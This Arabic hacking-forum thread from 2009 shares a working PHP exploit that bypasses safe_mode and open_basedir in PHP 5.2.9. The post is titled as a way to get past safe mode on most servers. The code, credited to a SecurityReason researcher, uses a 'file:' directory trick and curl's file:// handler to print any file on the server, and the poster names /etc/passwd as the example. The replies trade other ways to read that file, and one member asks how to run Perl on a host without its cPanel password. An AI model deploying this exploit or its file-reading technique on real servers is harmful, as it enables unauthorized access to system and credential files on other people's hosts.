|
|
|
|
 |
 |
 |
 |
 |
|
|
 |
|
|
 |
 |
|
|||||||
 |
 |
 |
| أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز |
 |
|
|
LinkBack | أدوات الموضوع |
05-05-2009, 09:22 PM
|
رقم المشاركة : 1 (permalink) | |
|
|
تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا
السلام عليكم ورحمة الله وبركاته كود:
<?php
/*
safe_mode and open_basedir Bypass PHP 5.2.9
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com
NOTE:
http://securityreason.com/achievement_securityalert/61
EXPLOIT:
http://securityreason.com/achievement_exploitalert/10
*/
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
echo '<PRE><P>This is exploit from <a
href="http://securityreason.com/" title="SecurityAudit">Security Audit - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.9 safe_mode & open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>';
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
if(FALSE==curl_exec($ch))
die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> </FONT>';
curl_close($ch);
?>
/etc/passwd مثلا أتمنى الموضوع يكون بسيط السلام عليكم, |
|
    
|
|
05-07-2009, 05:07 AM
|
رقم المشاركة : 5 (permalink) | |||
|
|
رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا
يعطيك العافيه اخوي بالنسبه لي قراءة ملف etc/passwd فيه عدة طرق
|
|||
|
|
|
05-08-2009, 08:54 PM
|
رقم المشاركة : 7 (permalink) | ||
|
|
رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا
مشكورين اخوانى على ردودكم اقتباس:
وياريت لو فيه طريقه تشغل البيرل والوضع الامن فعال ومفيش معايا باسوورد السى بانل  تقولها  لانى فعلا محتاجها |
||
|
|
|
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
| أدوات الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| سلسلة دروس اختراق السيرفرات وحل مشاكل المخترقين بعنوان i am rooting , watch me | Sniper Code | [ Videos] | 14 | 08-17-2010 12:13 PM |
|
روابط مهمة |
أقسام المنتدى |
||||
|
|
|
 |
 |
